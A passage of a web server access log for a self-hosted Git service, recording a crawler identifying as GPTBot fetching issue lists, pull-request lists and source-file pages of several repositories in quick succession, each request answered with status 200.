AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:19:31:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:31:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md?display=rendered" [Client 74.7.227.38] [Length 13816] [Gzip 2.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" -[17/Feb/2026:19:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md?display=source" [Client 74.7.227.38] [Length 15361] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" -[17/Feb/2026:19:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11549] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:19:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13575] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13571] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13568] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13570] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13569] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:32:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:32:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 